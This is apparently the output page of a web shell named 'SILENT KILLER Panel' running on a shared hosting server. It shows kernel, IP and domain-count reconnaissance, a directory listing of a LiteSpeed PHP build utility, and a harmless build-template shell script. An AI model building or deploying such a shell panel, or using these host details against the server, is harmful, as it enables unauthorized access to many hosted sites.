SILENT KILLERPanel

Current Path: > > usr > local > > lsws > admin > html > utility > > build_php


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: //usr/local//lsws/admin/html/utility//build_php

NameTypeSizeLast ModifiedActions
buildPHP.php File 567 bytes August 05 2025 14:49:11.
buildProgress.php File 367 bytes August 05 2025 14:49:11.
buildStep1.php File 1489 bytes August 05 2025 14:49:11.
buildStep2.php File 9571 bytes August 05 2025 14:49:11.
buildStep3.php File 3547 bytes August 05 2025 14:49:11.
buildStep4.php File 4322 bytes August 05 2025 14:49:11.
build_common.template File 565 bytes August 05 2025 14:49:11.
build_install.template File 4274 bytes August 05 2025 14:49:11.
build_install_ext.template File 1764 bytes August 05 2025 14:49:11.
build_manual_run.template File 1072 bytes August 05 2025 14:49:11.
build_prepare.template File 5412 bytes August 05 2025 14:49:11.
build_prepare_ext.template File 2664 bytes August 05 2025 14:49:11.
buildconf.inc.php File 2021 bytes August 05 2025 14:49:11.
buildfunc.inc.php File 27452 bytes August 05 2025 14:49:11.

Reading File: //usr/local//lsws/admin/html/utility//build_php/build_common.template

#!/bin/sh

###########################################
EXTRA_PATH_ENV="__extra_path_env__"
PROGRESS_F=__progress_f__
PHP_VERSION=__php_version__
PHP_BUILD_DIR=__php_build_dir__
###########################################

PATH=${EXTRA_PATH_ENV}$PATH

check_errs()
{
  if [ "${1}" -ne "0" ] ; then
    echo "**ERROR** ${2}"
    echo "**ERROR** ${2}" >> ${PROGRESS_F}
    exit ${1}
  fi
}

main_msg()
{
	# write to both stdout and progress
	echo "${1}"
	echo "${1}" >> ${PROGRESS_F}
}

# clear out
echo "**MAIN_STATUS** retrieved from ${PROGRESS_F}" > ${PROGRESS_F}


SILENT KILLER Tool